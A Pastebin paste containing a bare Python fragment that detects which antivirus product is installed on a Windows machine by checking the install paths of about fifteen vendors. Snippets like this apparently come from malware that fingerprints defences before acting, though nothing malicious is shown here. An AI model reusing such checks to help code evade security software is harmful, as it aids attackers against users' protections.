Advertisement
Guest User

Untitled

a guest
Mar 30th, 2020
891
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.25 KB | None | 0 0
  1. if os.path.exists('C:\\Program Files\\AVAST Software\\Avast'):
  2. av = 'Avast'
  3. if os.path.exists('C:\\Program Files\\AVG\\Antivirus'):
  4. av = 'AVG'
  5. if os.path.exists('C:\\Program Files\\Avira\\Launcher'):
  6. av = 'Avira'
  7. if os.path.exists('C:\\Program Files\\IObit\\Advanced SystemCare'):
  8. av = 'Advanced SystemCare'
  9. if os.path.exists('C:\\Program Files\\Bitdefender Antivirus Free'):
  10. av = 'Bitdefender'
  11. if os.path.exists('C:\\Program Files\\COMODO\\COMODO Internet Security'):
  12. av = 'Comodo'
  13. if os.path.exists('C:\\Program Files\\DrWeb'):
  14. av = 'Dr.Web'
  15. if os.path.exists('C:\\Program Files\\ESET\\ESET Security'):
  16. av = 'ESET'
  17. if os.path.exists('C:\\Program Files\\GRIZZLY Antivirus'):
  18. av = 'Grizzly Pro'
  19. if os.path.exists('C:\\Program Files\\Kaspersky Lab'):
  20. av = 'Kaspersky'
  21. if os.path.exists('C:\\Program Files\\IObit\\IObit Malware Fighter'):
  22. av = 'Malvare fighter'
  23. if os.path.exists('C:\\Program Files\\Norton Security'):
  24. av = 'Norton'
  25. if os.path.exists('C:\\Program Files\\Panda Security\\Panda Security Protection'):
  26. av = 'Panda Security'
  27. if os.path.exists('C:\\Program Files\\Windows Defender'):
  28. av = 'Windows Defender'
  29. if os.path.exists('C:\\Program Files\\360\\Total Security'):
  30. av = '360 Total Security'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement